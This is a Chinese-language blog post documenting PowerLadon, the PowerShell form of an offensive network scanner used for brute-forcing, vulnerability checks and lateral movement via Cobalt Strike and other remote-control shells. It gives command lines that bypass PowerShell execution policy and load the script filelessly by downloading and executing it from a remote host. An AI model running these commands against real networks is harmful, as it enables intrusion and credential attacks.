Ladon Scanner For PowerShell
本文于 1952 天之前发表
程序简介
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH(Linux主机)、VNC、Windows密码(IPC、WMI、SMB)、Weblogic后台、Rar压缩包密码等,Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
使用说明
ID | 主题 | URL |
---|---|---|
1 | Ladon文档主页 | https://github.com/k8gege/Ladon/wiki |
2 | 基础用法详解 | https://github.com/k8gege/Ladon/wiki/Ladon-Usage |
3 | Cobalt Strike | https://github.com/k8gege/Ladon/wiki/Ladon-&-Cobalt-Strike |
4 | Exp生成器使用 | https://github.com/k8gege/Ladon/wiki/LadonExp-Usage |
5 | 高度自定义插件 | https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle |
6 | 外部模块参考 | https://github.com/k8gege/K8CScan/wiki |
7 | PowerLadon | https://github.com/k8gege/Ladon/wiki/Ladon-&-PowerShell |
8 | PythonLadon | https://github.com/k8gege/PyLadon |
9 | LinuxLadon | https://github.com/k8gege/LinuxLadon |
10 | 漏洞演示视频 | https://github.com/k8gege/K8CScan/tree/master/Video |
PowerLadon
PowerLadon完美兼容win7-win10 PowerShell,对于不支持.net程序插件化的远控,可使用
PowerShell版,也可CMD命令行下远程加载内存实现无文件扫描,模块加载后用法和EXE一致。
Ladon.ps1脚本由EXE转换而成,具备EXE版所有功能,相关功能使用请查看Ladon说明文档。
下载
最新版本 https://github.com/k8gege/Ladon
历史版本 https://github.com/k8gege/PowerLadon
0x001 PowerShell本地加载
适用于支持PowerShell交互远控或Shell,如Cobalt Strike
1 | > powershell |
0x002 Cmd本地加载
适用于还没跟上时代的远控或Shell只支持CMD交互
1 | > powershell Import-Module .\Ladon.ps1;Ladon w |
0x004 Bypass 绕过PowerShell限制
1 | powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC |
Cobalt Strike
1 | shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010 |
0x005 自定义端口扫描
1 | powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445' |
Cobalt Strike
1 | shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445' |
0x003 Cmd远程加载
适用于还没跟上时代的远控或Shell只支持CMD交互
1 | > powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC" |
0x004 远控交互式CMD
0x005 菜刀非交互CMD
0x006 Empire非交互CMD
Empire的shell有点问题,分号被截断,可以加个cmd /c
0x007 MSF交互式CMD
.TestON
Win7 x86 (Microsoft Windows [6.1.7601])
Win8 x64 (Microsoft Windows [6.2.9200])
Win10 x64 (Microsoft Windows [10.0.14393])
Win11 x64 (Microsoft Windows [10.0.22000.856]
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org

扫码加入K8小密圈